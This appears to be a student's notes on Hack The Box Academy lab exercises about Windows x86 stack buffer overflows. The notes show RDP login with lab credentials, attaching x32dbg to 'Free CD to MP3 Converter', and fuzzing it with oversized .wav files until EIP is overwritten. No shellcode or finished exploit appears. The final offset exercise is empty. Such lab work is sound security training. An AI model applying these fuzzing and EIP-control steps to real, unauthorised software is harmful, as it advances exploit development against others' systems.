PRACTICAL EXERCISES

DEBUGGING WINDOWS PROGRAMS

Try to RDP into the Windows VM using one of the methods mentioned above, and apply what you learned in this module. When you try to attach to 'Free CD to MP3 Converter', what is the name of its process?
root@htb:~$ xfreerdp /v:10.129.43.22 /u:htb-student /p:Academy_student!
PS C:\> Set-Location ~/Desktop
PS C:\> Get-ChildItem .
 Directory: C:\Users\htb-student\Desktop
  Mode                 LastWriteTime         Length Name
  -a----         4/26/2021   6:39 AM           2006 CloudMe.lnk
  -a----         9/27/2025   7:57 PM           1041 Free CD to MP3 Converter.lnk

PS C:\> & ".\Free CD to MP3 Converter.lnk"
 ...

 * the "&" is PowerShell’s call operator that tells PowerShell to
   “take the next token (string, variable, or scriptblock) and execute it as a 
   command.”
    - it is when the command to be run is stored in a string or contains 
      spaces / special characters.

PS C:\> .\x32dbg.lnk
X32DBG > File > Attach
 Program Name: Free CD to MP3 Converter
 
X32DBG > Attach
  PID=6356
  Name=cdextract
  Title=Free CD to MP3 Converter
  Path=C:\Program Files\CD to MP3 Freeware\cdextract.exe

FUZZING PARAMETERS

Try to fuzz the program with '.wav' files of increments of 1000 bytes '1000, 2000, 3000...', and find the smallest payload size that crashes the program and overwrites EIP with '41414141'.
root@htb:~$ xfreerdp /v:10.129.43.22 /u:htb-student /p:Academy_student!
PS C:\> Set-Location ~/Desktop
PS C:\> Get-ChildItem .
 Directory: C:\Users\htb-student\Desktop
  Mode                 LastWriteTime         Length Name
  -a----         4/26/2021   6:39 AM           2006 CloudMe.lnk
  -a----         9/27/2025   7:57 PM           1041 Free CD to MP3 Converter.lnk

PS C:\> & ".\Free CD to MP3 Converter.lnk"
 ...
 
PS C:\> .\x32dbg.lnk
X32DBG > File > Attach
 Program Name: Free CD to MP3 Converter
 
X32DBG > Attach
  PID=6356
  Name=cdextract
  Title=Free CD to MP3 Converter
  Path=C:\Program Files\CD to MP3 Freeware\cdextract.exe
root@htb:~$ python -c "print('A'*1000, file=open('fuzz1k.wav', 'w'))"
root@htb:~$ python -c "print('A'*2000, file=open('fuzz2k.wav', 'w'))"
root@htb:~$ python -c "print('A'*3000, file=open('fuzz3k.wav', 'w'))"
root@htb:~$ python -c "print('A'*4000, file=open('fuzz4k.wav', 'w'))"
root@htb:~$ python -c "print('A'*5000, file=open('fuzz5k.wav', 'w'))"
root@htb:~$ python -c "print('A'*6000, file=open('fuzz6k.wav', 'w'))"
root@htb:~$ python3 -m http.server 8080
 ...
  
PS C:\> Invoke-WebRequest -Uri "http://10.10.14.46:8080/fuzz1k.wav" -OutFile fuzz1k.wav
PS C:\> Invoke-WebRequest -Uri "http://10.10.14.46:8080/fuzz2k.wav" -OutFile fuzz2k.wav
PS C:\> Invoke-WebRequest -Uri "http://10.10.14.46:8080/fuzz3k.wav" -OutFile fuzz3k.wav
PS C:\> Invoke-WebRequest -Uri "http://10.10.14.46:8080/fuzz4k.wav" -OutFile fuzz4k.wav
PS C:\> Invoke-WebRequest -Uri "http://10.10.14.46:8080/fuzz5k.wav" -OutFile fuzz5k.wav
PS C:\> Invoke-WebRequest -Uri "http://10.10.14.46:8080/fuzz6k.wav" -OutFile fuzz6k.wav

Free CD to MP3 Converter > File > Wav to Mp3
 Filename: fuzz1k.wav
 ...
 Filename: fuzz5k.wav
  x64GDB
   EIP: 41414141

CONTROLLING EIP

If you find the value 'B5eB' in EIP after sending your pattern, what would be the EIP offset?

// Some code

Previous05.STACK-BASED BUFFER OVERFLOWS ON WINDOWS X86NextSKILLS ASSESSMENT

Last updated